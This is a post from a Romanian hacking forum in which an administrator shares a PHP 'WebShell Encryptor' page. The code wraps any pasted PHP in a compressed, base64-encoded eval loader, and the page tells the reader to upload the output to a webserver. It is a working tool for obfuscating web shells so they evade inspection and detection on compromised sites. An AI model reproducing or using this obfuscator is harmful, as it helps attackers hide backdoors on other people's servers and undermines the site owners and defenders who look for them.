H4cky0u Forum
Tutoriale de toate tipurile
|
Nou pe simpatie: alexxandra
 | Femeie 24 ani Timis cauta Barbat 26 - 59 ani |
|
|
H4cky0u ForumReguliInregistrareLoginPozeNu sunteti logat. Lista Forumurilor Pe Tematici
|
| #1 |
GaMaAdministrator
Postari: 205
|
|
Code:
<?php
if(isset($_POST['t'])) {
$output = '<?php /* fx0 */
eval("?>".gzuncompress(base64_decode("'.base64_encode(gzcompress(stripslashes($_POST['t']))).'"))); ?>';
}
?>
<head>
<title>WebShell Encryptor</title>
<style>
body { background-color: #000; color: #0F0;}
#h { width: 100%; background-color: #C30; border: 2px solid #FFF; height: 50px; color:#FFF; text-align: center; }
#h h2 { color:#FFF; margin-top: -5px; font-size: 48px;}
#c { text-align: center; width: 100%; }
#t { width: 400px; height: 400px; }
a { color: #0F0;}
</style>
</head>
<body>
<div id="c">
<fieldset>
<legend>Info:</legend>
Just enter the code In the input file, click encrypt code and copy the code you get in a file. Then upload it to your webserver<br />
</fieldset>
Code:<br />
<form action="<?=$_SERVER['php_self']?>" method="post">
<textarea id="t" name="t"><?=@$output?></textarea><br />
<input type="submit" value="Encrypt code" />
<br />
</div>
</body>
</html> |
|
|
| |
|